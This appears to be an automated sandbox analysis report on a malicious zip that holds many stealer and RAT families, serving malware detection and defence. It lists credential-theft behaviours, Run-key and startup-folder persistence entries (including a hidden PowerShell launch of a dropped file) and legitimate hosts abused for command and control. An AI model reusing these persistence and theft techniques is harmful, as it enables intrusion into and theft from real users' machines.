Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
AsyncRat
RedLine payload
Amadey
Xworm
Detects ZharkBot payload
Quasar RAT
njRAT/Bladabindi
RedLine
Merlin payload
Detect Xworm Payload
ZharkBot
Vidar family
Vidar
Asyncrat family
Merlin
Zharkbot family
Phorphiex payload
Xworm family
Quasar family
Phorphiex, Phorpiex
Phorphiex family
Njrat family
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Merlin family
Redline family
Detect Vidar Stealer
Amadey family
Async RAT payload
Blocklisted process makes network request
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies Windows Firewall
Clipboard Data
Drops startup file
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Checks computer location settings
VMProtect packed file
Unsecured Credentials: Credentials In Files
Obfuscated Files or Information: Command Obfuscation
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Enumerates connected drives
Adds Run key to start application
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops autorun.inf file
UPX packed file
Enumerates processes with tasklist
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
Event Triggered Execution: Installer Packages
Program crash
Embeds OpenSSL
System Network Configuration Discovery: Internet Connection Discovery
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Detects Pyinstaller
System Network Configuration Discovery: Wi-Fi Discovery
Gathers system information
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Detects videocard installed
Delays execution with timeout.exe
Kills process with taskkill
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Control Panel
Runs ping.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
GoLang User-Agent
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-14 13:14
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-14 13:14
Reported
2024-12-14 13:22
Platform
win10v2004-20241007-es
Max time kernel
266s
Max time network
350s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Merlin
Merlin family
Merlin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Njrat family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 7184 created 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif | C:\Windows\Explorer.EXE |
| PID 7184 created 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif | C:\Windows\Explorer.EXE |
| PID 3452 created 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif | C:\Windows\Explorer.EXE |
| PID 6828 created 3396 | N/A | C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com | C:\Windows\Explorer.EXE |
Vidar
Vidar family
Xworm
Xworm family
ZharkBot
Zharkbot family
njRAT/Bladabindi
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\XSploitLauncher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url | C:\Windows\SYSTEM32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url | C:\Windows\SYSTEM32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads local data of messenger clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HardDiskSentinea = "C:\\Users\\Admin\\Favorites\\HardDiskSentine\\redist\\HardDiskSentinelBin.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe" | C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svсhost = "C:\\Users\\Admin\\AppData\\Roaming\\svсhost.exe" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" | C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" | C:\Windows\system32\audiodg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .." | C:\Windows\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Desktop\\New Text Document mod.exse\\a\\VmManagedSetup.exe'\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .." | C:\Windows\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\347814563.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wave = "C:\\Users\\Admin\\AppData\\Roaming\\Wave.exe" | C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
